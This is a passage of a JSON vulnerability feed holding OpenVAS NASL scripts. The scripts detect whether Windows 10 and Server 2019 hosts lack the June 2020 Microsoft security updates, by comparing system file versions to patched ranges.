\"CVE-2020-1290\",\n \"CVE-2020-1291\", \"CVE-2020-1293\", \"CVE-2020-1294\", \"CVE-2020-1299\",\n \"CVE-2020-1300\", \"CVE-2020-1301\", \"CVE-2020-1302\", \"CVE-2020-1304\",\n \"CVE-2020-1305\", \"CVE-2020-1309\", \"CVE-2020-1310\", \"CVE-2020-1311\",\n \"CVE-2020-1312\", \"CVE-2020-1314\", \"CVE-2020-1315\", \"CVE-2020-1316\",\n \"CVE-2020-1317\", \"CVE-2020-1324\", \"CVE-2020-1334\", \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4561602)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4561602\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error when the Windows GDI component improperly discloses the contents of its\n memory.\n\n - An error when the Windows Runtime improperly handles objects in memory.\n\n - An error in the way that the VBScript engine handles objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information and\n conduct denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1709 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1709 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4561602\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Ntoskrnl.exe\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.16299.0\", test_version2:\"10.0.16299.1931\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Ntoskrnl.exe\",\n file_version:dllVer, vulnerable_range:\"10.0.16299.0 - 10.0.16299.1931\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1244", "CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1277", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1274", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1296", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1204", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1242", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "description": "This host is missing a critical security\n update according to Microsoft KB4561608", "modified": "2020-07-16T00:00:00", "published": "2020-06-10T00:00:00", "id": "OPENVAS:1361412562310817142", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817142", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4561608)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817142\");\n script_version(\"2020-07-16T11:59:37+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1073\",\n \"CVE-2020-1160\", \"CVE-2020-1162\", \"CVE-2020-1194\", \"CVE-2020-1196\",\n \"CVE-2020-1197\", \"CVE-2020-1199\", \"CVE-2020-1201\", \"CVE-2020-1202\",\n \"CVE-2020-1203\", \"CVE-2020-1204\", \"CVE-2020-1207\", \"CVE-2020-1208\",\n \"CVE-2020-1211\", \"CVE-2020-1212\", \"CVE-2020-1213\", \"CVE-2020-1214\",\n \"CVE-2020-1215\", \"CVE-2020-1216\", \"CVE-2020-1217\", \"CVE-2020-1219\",\n \"CVE-2020-1220\", \"CVE-2020-1222\", \"CVE-2020-1230\", \"CVE-2020-1231\",\n \"CVE-2020-1232\", \"CVE-2020-1233\", \"CVE-2020-1234\", \"CVE-2020-1235\",\n \"CVE-2020-1236\", \"CVE-2020-1237\", \"CVE-2020-1238\", \"CVE-2020-1239\",\n \"CVE-2020-1241\", \"CVE-2020-1242\", \"CVE-2020-1244\", \"CVE-2020-1246\",\n \"CVE-2020-1247\", \"CVE-2020-1251\", \"CVE-2020-1253\", \"CVE-2020-1254\",\n \"CVE-2020-1255\", \"CVE-2020-1257\", \"CVE-2020-1258\", \"CVE-2020-1259\",\n \"CVE-2020-1260\", \"CVE-2020-1261\", \"CVE-2020-1262\", \"CVE-2020-1263\",\n \"CVE-2020-1264\", \"CVE-2020-1266\", \"CVE-2020-1269\", \"CVE-2020-1270\",\n \"CVE-2020-1271\", \"CVE-2020-1272\", \"CVE-2020-1274\", \"CVE-2020-1276\",\n \"CVE-2020-1277\", \"CVE-2020-1278\", \"CVE-2020-1279\", \"CVE-2020-1280\",\n \"CVE-2020-1281\", \"CVE-2020-1282\", \"CVE-2020-1283\", \"CVE-2020-1286\",\n \"CVE-2020-1287\", \"CVE-2020-1290\", \"CVE-2020-1291\", \"CVE-2020-1292\",\n \"CVE-2020-1293\", \"CVE-2020-1294\", \"CVE-2020-1296\", \"CVE-2020-1299\",\n \"CVE-2020-1300\", \"CVE-2020-1301\", \"CVE-2020-1302\", \"CVE-2020-1304\",\n \"CVE-2020-1305\", \"CVE-2020-1306\", \"CVE-2020-1309\", \"CVE-2020-1310\",\n \"CVE-2020-1311\", \"CVE-2020-1312\", \"CVE-2020-1314\", \"CVE-2020-1315\",\n \"CVE-2020-1316\", \"CVE-2020-1317\", \"CVE-2020-1324\", \"CVE-2020-1334\",\n \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 11:59:37 +0000 (Thu, 16 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4561608)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4561608\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error when the Windows GDI component improperly discloses the contents of its\n memory.\n\n - An error when the Windows Runtime improperly handles objects in memory.\n\n - An error in the way that the VBScript engine handles objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information, bypass\n security restrictions, conduct spoofing and denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1809 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1809 for x64-based Systems\n\n - Microsoft Windows Server 2019\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4561608\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2019:1) <= 0)\n exit(0);\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"drivers\\Dxgkrnl.sys\");\nif(!dllVer)\n exit(0);\n\nif(version_is_less(version:dllVer, test_version:\"10.0.17763.1282\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\drivers\\Dxgkrnl.sys\",\n file_version:dllVer, vulnerable_range:\"Less than 10.0.17763.1282\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1274", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1242", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "description": "This host is missing a critical security\n update according to Microsoft KB4561621", "modified": "2020-07-17T00:00:00", "published": "2020-06-10T00:00:00", "id": "OPENVAS:1361412562310817145", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817145", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4561621)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817145\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1073\",\n \"CVE-2020-1160\", \"CVE-2020-1162\", \"CVE-2020-1194\", \"CVE-2020-1196\",\n \"CVE-2020-1197\", \"CVE-2020-1199\", \"CVE-2020-1201\", \"CVE-2020-1202\",\n \"CVE-2020-1203\", \"CVE-2020-1207\", \"CVE-2020-1208\", \"CVE-2020-1211\",\n \"CVE-2020-1212\", \"CVE-2020-1213\", \"CVE-2020-1214\", \"CVE-2020-1215\",\n \"CVE-2020-1216\", \"CVE-2020-1217\", \"CVE-2020-1219\", \"CVE-2020-1220\",\n \"CVE-2020-1222\", \"CVE-2020-1230\", \"CVE-2020-1231\", \"CVE-2020-1232\",\n \"CVE-2020-1233\", \"CVE-2020-1234\", \"CVE-2020-1235\", \"CVE-2020-1236\",\n \"CVE-2020-1237\", \"CVE-2020-1238\", \"CVE-2020-1239\", \"CVE-2020-1241\",\n \"CVE-2020-1242\", \"CVE-2020-1246\", \"CVE-2020-1247\", \"CVE-2020-1251\",\n \"CVE-2020-1253\", \"CVE-2020-1254\", \"CVE-2020-1255\", \"CVE-2020-1257\",\n \"CVE-2020-1258\", \"CVE-2020-1259\", \"CVE-2020-1260\", \"CVE-2020-1261\",\n \"CVE-2020-1262\", \"CVE-2020-1263\", \"CVE-2020-1264\", \"CVE-2020-1266\",\n \"CVE-2020-1269\", \"CVE-2020-1270\", \"CVE-2020-1271\", \"CVE-2020-1272\",\n \"CVE-2020-1274\", \"CVE-2020-1276\", \"CVE-2020-1278\", \"CVE-2020-1279\",\n \"CVE-2020-1280\", \"CVE-2020-1281\", \"CVE-2020-1282\", \"CVE-2020-1283\",\n \"CVE-2020-1286\", \"CVE-2020-1287\", \"CVE-2020-1290\", \"CVE-2020-1291\",\n \"CVE-2020-1292\", \"CVE-2020-1293\", \"CVE-2020-1294\", \"CVE-2020-1299\",\n \"CVE-2020-1300\", \"CVE-2020-1301\", \"CVE-2020-1302\", \"CVE-2020-1304\",\n \"CVE-2020-1305\", \"CVE-2020-1306\", \"CVE-2020-1309\", \"CVE-2020-1310\",\n \"CVE-2020-1311\", \"CVE-2020-1312\", \"CVE-2020-1314\", \"CVE-2020-1315\",\n \"CVE-2020-1316\", \"CVE-2020-1317\", \"CVE-2020-1324\", \"CVE-2020-1334\",\n \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4561621)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4561621\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error when the Windows GDI component improperly discloses the contents of its\n memory.\n\n - An error when the Windows Runtime improperly handles objects in memory.\n\n - An error in the way Windows Error Reporting (WER) handles objects in memory.\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information, bypass\n security restrictions, conduct spoofing and denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1803 for 32-bit/x64-based Systems.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4561621\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Ntoskrnl.exe\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.17134.0\", test_version2:\"10.0.17134.1549\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Ntoskrnl.exe\",\n file_version:dllVer, vulnerable_range:\"10.0.17134.0 - 10.0.17134.1549\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1244", "CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1277", "CVE-2020-1207", "CVE-2020-1275", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1274", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1273", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1307", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1209", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1313", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1296", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1204", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1265", "CVE-2020-1268", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1242", "CVE-2020-1206", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1248", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "description": "This host is missing a critical security\n update according to Microsoft KB4560960", "modified": "2020-07-17T00:00:00", "published": "2020-06-10T00:00:00", "id": "OPENVAS:1361412562310817140", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817140", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4560960)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817140\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1073\",\n \"CVE-2020-1160\", \"CVE-2020-1162\", \"CVE-2020-1194\", \"CVE-2020-1196\",\n \"CVE-2020-1197\", \"CVE-2020-1199\", \"CVE-2020-1201\", \"CVE-2020-1202\",\n \"CVE-2020-1203\", \"CVE-2020-1204\", \"CVE-2020-1206\", \"CVE-2020-1207\",\n \"CVE-2020-1208\", \"CVE-2020-1209\", \"CVE-2020-1211\", \"CVE-2020-1212\",\n \"CVE-2020-1213\", \"CVE-2020-1214\", \"CVE-2020-1215\", \"CVE-2020-1216\",\n \"CVE-2020-1217\", \"CVE-2020-1219\", \"CVE-2020-1220\", \"CVE-2020-1222\",\n \"CVE-2020-1230\", \"CVE-2020-1231\", \"CVE-2020-1232\", \"CVE-2020-1233\",\n \"CVE-2020-1234\", \"CVE-2020-1235\", \"CVE-2020-1236\", \"CVE-2020-1237\",\n \"CVE-2020-1238\", \"CVE-2020-1239\", \"CVE-2020-1241\", \"CVE-2020-1242\",\n \"CVE-2020-1244\", \"CVE-2020-1246\", \"CVE-2020-1247\", \"CVE-2020-1248\",\n \"CVE-2020-1251\", \"CVE-2020-1253\", \"CVE-2020-1254\", \"CVE-2020-1255\",\n \"CVE-2020-1257\", \"CVE-2020-1258\", \"CVE-2020-1259\", \"CVE-2020-1260\",\n \"CVE-2020-1261\", \"CVE-2020-1262\", \"CVE-2020-1263\", \"CVE-2020-1264\",\n \"CVE-2020-1265\", \"CVE-2020-1266\", \"CVE-2020-1268\", \"CVE-2020-1269\",\n \"CVE-2020-1270\", \"CVE-2020-1271\", \"CVE-2020-1272\", \"CVE-2020-1273\",\n \"CVE-2020-1274\", \"CVE-2020-1275\", \"CVE-2020-1276\", \"CVE-2020-1277\",\n \"CVE-2020-1278\", \"CVE-2020-1279\", \"CVE-2020-1280\", \"CVE-2020-1281\",\n \"CVE-2020-1282\", \"CVE-2020-1283\", \"CVE-2020-1286\", \"CVE-2020-1287\",\n \"CVE-2020-1290\", \"CVE-2020-1291\", \"CVE-2020-1292\", \"CVE-2020-1293\",\n \"CVE-2020-1294\", \"CVE-2020-1296\", \"CVE-2020-1299\", \"CVE-2020-1300\",\n \"CVE-2020-1301\", \"CVE-2020-1302\", \"CVE-2020-1304\", \"CVE-2020-1305\",\n \"CVE-2020-1306\", \"CVE-2020-1307\", \"CVE-2020-1309\", \"CVE-2020-1310\",\n \"CVE-2020-1311\", \"CVE-2020-1312\", \"CVE-2020-1313\", \"CVE-2020-1314\",\n \"CVE-2020-1315\", \"CVE-2020-1316\", \"CVE-2020-1317\", \"CVE-2020-1324\",\n \"CVE-2020-1334\", \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4560960)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4560960\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error when the Windows GDI component improperly discloses the contents of its\n memory.\n\n - An error when the Windows Runtime improperly handles objects in memory.\n\n - An error in the way that the VBScript engine handles objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information and\n conduct denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1903 for 32-bit/x64-based Systems\n\n - Microsoft Windows 10 Version 1909 for 32-bit/x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4560960\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Kernel32.dll\");\nif(!fileVer)\n exit(0);\n\nif(version_in_range(version:fileVer, test_version:\"10.0.18362.0\", test_version2:\"10.0.18362.899\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Kernel32.dll\",\n file_version:fileVer, vulnerable_range:\"10.0.18362.0 - 10.0.18362.899\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1244", "CVE-2020-1253", "CVE-2020-1203", "CVE-2020-1277", "CVE-2020-1207", "CVE-2020-1275", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1251", "CVE-2020-1274", 